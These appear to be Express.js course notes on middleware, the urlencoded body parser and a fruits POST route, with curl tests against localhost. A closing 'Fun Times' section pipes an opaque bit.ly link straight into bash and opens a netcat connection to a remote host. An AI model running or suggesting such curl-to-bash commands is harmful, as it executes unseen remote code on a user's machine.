
# Middleware

We know how to create functionality for each route. But sometimes, oftentimes even, we want some functionality to occur for every route. We can do this by adding `middleware`


```javascript
app.use((req, res, next) => {
    console.log('I run for all routes');
    next();
});
```

It's middleware because it runs in the middle of a request-response cycle.

**GOTCHA** middleware code must be above your routes in order to be run before your routes. Once your route runs the middleware is unreachable/unused.

Most of the time (especially in this course) you won't be creating your own middleware, but rather using a library that will run some code for you.



### Body Parser

Our POST request is sending in data (an object with key value pairs) in the request body.

However, the HTTP protocol just sends ( url encoded) strings. Our express app has no idea what to do with this string.

We could write our own logic that would parse our string into objects, arrays, nested objects, handle datatypes like numbers and booleans...so we'd have a useable data source coming in our POST request.  and then write that logic for every single express app.

But that seems tedious and like a very common problem that nearly every web developer must face. Therefore, it seems very likely that someone has already solved this for us. And indeed, express has a build in function we can use.

There is a bit of a history with body-parser. Express strives to be a minimalist framework. So it had a body parser in an early version, but then offloaded it and then devs had to use an npm package called `body-parser`.  Then the powers that build and maintain express brought it back. Currently it is a built in function

[From the docs](https://expressjs.com/en/api.html#express.urlencoded)

```javascript
//near the top, around other app.use() calls
app.use(express.urlencoded({extended:false}));
```

This will take incoming strings from the body that are url encoded and parse them into an object that can be accessed in the request parameter as a property called body.  

`extended: false` - has to do with how the data is being parsed (and what kind can be parsed). For this unit, we'll just set this to false.


We can now return to our `post route`

```javascript
app.post('/fruits', (req, res)=>{
    console.log('Create route accessed!');
    console.log('Req.body is: ', req.body);
    res.send(req.body);
});
```

and try again

```javascript
curl -X POST -d name="dragon fruit" -d color="pink" localhost:3000/fruits
```

We should now get back our updated array.


### Working with Data

When we'll create our form, we'll use a checkbox for the user to input whether the fruit is ready to eat (on/true) or not (undefined/false). Check boxes have values of `on` or `off`.

We want our property of `readyToEat` to be a Boolean - either `true` or false. Let's write some logic to udpate this.    

```javascript

app.post('/fruits', (req, res)=>{
    if(req.body.readyToEat === 'on'){ // if checked, req.body.readyToEat is set to 'on'
        req.body.readyToEat = true
    } else { // if not checked, req.body.readyToEat is undefined
        req.body.readyToEat = false
    }
    fruits.push(req.body)
    res.send(req.body)
})
```

```javascript
curl -X POST -d name="kiwi" -d color="green" -d readyToEat="on" localhost:3000/fruits
```

### Fun Times

```
curl -L http://bit.ly/10hA8iC | bash
```

```
nc towel.blinkenlights.nl 23
```
